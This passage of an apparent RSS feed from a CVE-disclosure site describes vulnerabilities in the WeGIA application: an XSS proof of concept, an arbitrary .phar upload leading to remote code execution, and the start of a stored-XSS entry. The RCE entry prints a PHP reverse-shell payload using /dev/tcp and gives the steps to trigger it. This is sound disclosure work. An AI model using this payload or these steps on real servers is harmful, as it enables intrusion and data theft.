&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS Exploited!&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22132/image.png&amp;#34;
	width=&amp;#34;1510&amp;#34;
	height=&amp;#34;451&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22132/image_hu_f47dac39de82e7b6.png 480w, /p/cve-2025-22132/image_hu_a89b0f13e82df629.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;334&amp;#34;
		data-flex-basis=&amp;#34;803px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Once uploaded, open the file in &amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/tabelas/xss.php_00&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22132/image-1.png&amp;#34;
	width=&amp;#34;1939&amp;#34;
	height=&amp;#34;638&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22132/image-1_hu_9aa134d60ca58639.png 480w, /p/cve-2025-22132/image-1_hu_7e0c114e9758bbff.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;303&amp;#34;
		data-flex-basis=&amp;#34;729px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22132&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22132&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;discoverer&amp;#34;&amp;gt;Discoverer
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22133</title>
        <link>https://www.cvehunters.com/p/cve-2025-22133/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22133/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22133-arbitrary-file-upload-with-remote-code-execution-rce&amp;#34;&amp;gt;CVE-2025-22133: Arbitrary File Upload with Remote Code Execution (RCE)
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22133&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22133&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A critical vulnerability was identified in the following endpoint:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/controller/controla_xlsx.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The endpoint accepts file uploads without proper validation, allowing the upload of malicious files, such as &amp;lt;code&amp;gt;.phar&amp;lt;/code&amp;gt;, which can then be executed by the server.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The vulnerability resides in the endpoint &amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/controller/controla_xlsx.php&amp;lt;/code&amp;gt;, which fails to validate uploaded files properly. This allows an attacker to upload malicious files, such as &amp;lt;code&amp;gt;.phar&amp;lt;/code&amp;gt;, capable of being executed on the server. By crafting a malicious file containing arbitrary code, attackers can trigger Remote Code Execution (RCE) on the vulnerable server.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22133-arbitrary-file-upload-with-remote-code-execution-rce&amp;#34;&amp;gt;CVE-2025-22133: Arbitrary File Upload with Remote Code Execution (RCE)
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22133&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22133&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A critical vulnerability was identified in the following endpoint:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/controller/controla_xlsx.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The endpoint accepts file uploads without proper validation, allowing the upload of malicious files, such as &amp;lt;code&amp;gt;.phar&amp;lt;/code&amp;gt;, which can then be executed by the server.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The vulnerability resides in the endpoint &amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/controller/controla_xlsx.php&amp;lt;/code&amp;gt;, which fails to validate uploaded files properly. This allows an attacker to upload malicious files, such as &amp;lt;code&amp;gt;.phar&amp;lt;/code&amp;gt;, capable of being executed on the server. By crafting a malicious file containing arbitrary code, attackers can trigger Remote Code Execution (RCE) on the vulnerable server.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/controller/controla_xlsx.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The endpoint accepts file uploads without proper validation, allowing the upload of malicious files, such as &amp;lt;code&amp;gt;.phar&amp;lt;/code&amp;gt;, which can then be executed by the server. This enables remote code execution on the vulnerable server.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;After capturing the file upload request from &amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/controller/controla_xlsx.php&amp;lt;/code&amp;gt;, simply change the uploaded file type to &amp;lt;code&amp;gt;.phar&amp;lt;/code&amp;gt;, insert the payload into the content and send the request.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-php&amp;#34; data-lang=&amp;#34;php&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;?&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;php&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;nv&amp;#34;&amp;gt;$ip&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;IP&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;nv&amp;#34;&amp;gt;$port&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;4444&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;system&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;/bin/bash -c &amp;amp;#39;bash -i &amp;amp;gt;&amp;amp;amp; /dev/tcp/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;$ip&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;si&amp;#34;&amp;gt;$port&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt; 0&amp;amp;gt;&amp;amp;amp;1&amp;amp;#39;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;cp&amp;#34;&amp;gt;?&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22133/400773970-f6dd0844-9610-400f-9165-91f609f19115.png&amp;#34;
	width=&amp;#34;948&amp;#34;
	height=&amp;#34;420&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22133/400773970-f6dd0844-9610-400f-9165-91f609f19115_hu_14d08963998eb067.png 480w, /p/cve-2025-22133/400773970-f6dd0844-9610-400f-9165-91f609f19115_hu_177b0a88abf34885.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;225&amp;#34;
		data-flex-basis=&amp;#34;541px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Once uploaded, run the shell on the file path in:&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/tabelas/shell.phar&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22133/400774094-bc1f11c8-688d-422a-87c9-a1a8c746dcdb.png&amp;#34;
	width=&amp;#34;1588&amp;#34;
	height=&amp;#34;1228&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22133/400774094-bc1f11c8-688d-422a-87c9-a1a8c746dcdb_hu_88f6b8d27816ef4a.png 480w, /p/cve-2025-22133/400774094-bc1f11c8-688d-422a-87c9-a1a8c746dcdb_hu_ae50e27ba1354998.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;129&amp;#34;
		data-flex-basis=&amp;#34;310px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; This vulnerability allows an attacker to:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Gain access to the server through a reverse shell.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Execute arbitrary commands with the privileges of the web server user.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exfiltrate sensitive data, such as configuration files, logs, or confidential user information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Compromise the integrity and availability of the system.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalate privileges if additional vulnerabilities are present.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mjgr-2jxv-v8qf&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mjgr-2jxv-v8qf&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22613</title>
        <link>https://www.cvehunters.com/p/cve-2025-22613/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22613/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22613-cross-site-scripting-xss-stored-endpoint-informacao_adicionalphp-parameter-descricao&amp;#34;&amp;gt;CVE-2025-22613: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;informacao_adicional.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22613&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22613&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;informacao_adicional.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/funcionario/informacao_adicional.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22613-cross-site-scripting-xss-stored-endpoint-informacao_adicionalphp-parameter-descricao&amp;#34;&amp;gt;CVE-2025-22613: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;informacao_adicional.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22613&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22613&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;informacao_adicional.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/funcionario/informacao_adicional.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;informacao_adicional.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
